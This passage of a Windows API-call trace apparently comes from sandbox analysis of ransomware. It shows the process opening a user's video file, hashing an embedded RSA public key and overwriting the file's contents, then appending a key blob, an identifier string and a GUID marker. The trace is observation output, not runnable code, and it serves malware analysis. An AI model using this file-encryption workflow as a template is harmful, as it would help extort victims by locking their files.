ftLastWriteTime.dwLowDateTime=0x10a8e410, ftLastWriteTime.dwHighDateTime=0x1d5baf7, nFileSizeHigh=0x0, nFileSizeLow=0xa949, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="36oswwxbZIVtrKr3R6T.avi", cAlternateFileName="36OSWW~1.AVI")) returned 1 [0099.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.902] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\36oswwxbZIVtrKr3R6T.avi") returned=".avi" [0099.902] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\36oswwxbZIVtrKr3R6T.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\36oswwxbzivtrkr3r6t.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.903] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=43337) returned 1 [0099.903] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.906] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa923, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.906] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.907] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.907] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xa949, lpOverlapped=0x0) returned 1 [0099.908] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.908] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.908] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.908] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0099.909] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.909] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.909] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.909] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.909] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.909] GetLastError () returned 0x0 [0099.909] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.909] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0099.909] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.909] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.909] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.909] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.909] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.909] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.909] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.909] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa950) returned 0x9ba6d90 [0099.910] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c070 [0099.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a88 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c0b8 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7aa0 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ad0 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ae8 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.911] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ad0 | out: hHeap=0x630000) returned 1 [0099.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ae8 | out: hHeap=0x630000) returned 1 [0099.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ae8 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7ad0 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0099.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ae8 | out: hHeap=0x630000) returned 1 [0099.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ad0 | out: hHeap=0x630000) returned 1 [0099.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.912] GetCurrentThreadId () returned 0x42c [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6038 [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.912] GetCurrentThreadId () returned 0x42c [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0099.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ad0 [0099.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ae8 [0099.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ab8 [0099.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0099.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7b00 [0099.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0099.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0099.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ad0 | out: hHeap=0x630000) returned 1 [0099.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ad0 [0099.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0099.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ad0 | out: hHeap=0x630000) returned 1 [0099.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b00 | out: hHeap=0x630000) returned 1 [0099.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ae8 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ab8 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7aa0 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c0b8 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.916] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0xa944, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xa944, lpOverlapped=0x0) returned 1 [0099.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.917] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa949, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.917] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0099.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0099.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.917] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.917] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.917] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.917] CloseHandle (hObject=0x5cc) returned 1 [0099.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0099.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.929] MoveFileW 